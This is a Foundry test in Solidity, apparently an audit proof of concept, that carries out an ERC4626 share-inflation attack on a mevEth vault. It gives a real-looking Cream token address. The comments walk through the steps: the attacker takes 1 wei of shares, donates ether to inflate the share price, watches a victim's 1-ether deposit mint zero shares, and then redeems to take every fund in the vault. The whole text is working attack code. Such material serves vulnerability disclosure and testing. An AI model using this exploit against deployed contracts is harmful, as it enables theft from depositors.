PATCH THE REDEEMCREAM TRANSFER TO 0 BUG BEFORE RUNNING THIS, APPEND THIS TO ERC4626FULLTEST
function testCreamyInflationAttack() public {
address cream = 0x49D72e3973900A195A155a46441F0C08179FdB64;
uint256 creamAmount = 1; // 1 wei
// give 1 wei of cream to attacker, and 1 whole ether
deal(cream, User01, creamAmount);
vm.deal(User01, 1 ether);
vm.deal(address(mevEth), creamAmount); // attacker needs to dump the creamAmount so the last redeem don't revert, can be done in practice with selfdestruct to dump native ether directly as fallback is access controlled and grantRewards inflates fraction.elastic which we don't want at this step
vm.startPrank(User01); // attacker frontruns
ERC20(cream).approve(address(mevEth), creamAmount);
mevEth.redeemCream(creamAmount);
assertEq(mevEth.balanceOf(User01), creamAmount);
// dump 1 ether to inflate `fraction.elastic`
mevEth.grantRewards{ value: 1 ether }();
vm.startPrank(User02); // victim deposits 1 ether
mevEth.deposit{ value: 1 ether }(1 ether, User02);
assertEq(mevEth.balanceOf(User02), 0);
vm.startPrank(User01); // attacker sandwiches the victim
mevEth.redeem(mevEth.balanceOf(User01), User01, User01); // redeems all of their shares
assertEq(weth.balanceOf(User01), 2 ether + 1 wei); // attacker steals victim's funds
assertEq(address(mevEth).balance, 0); // assert all funds are stolen from meveth
}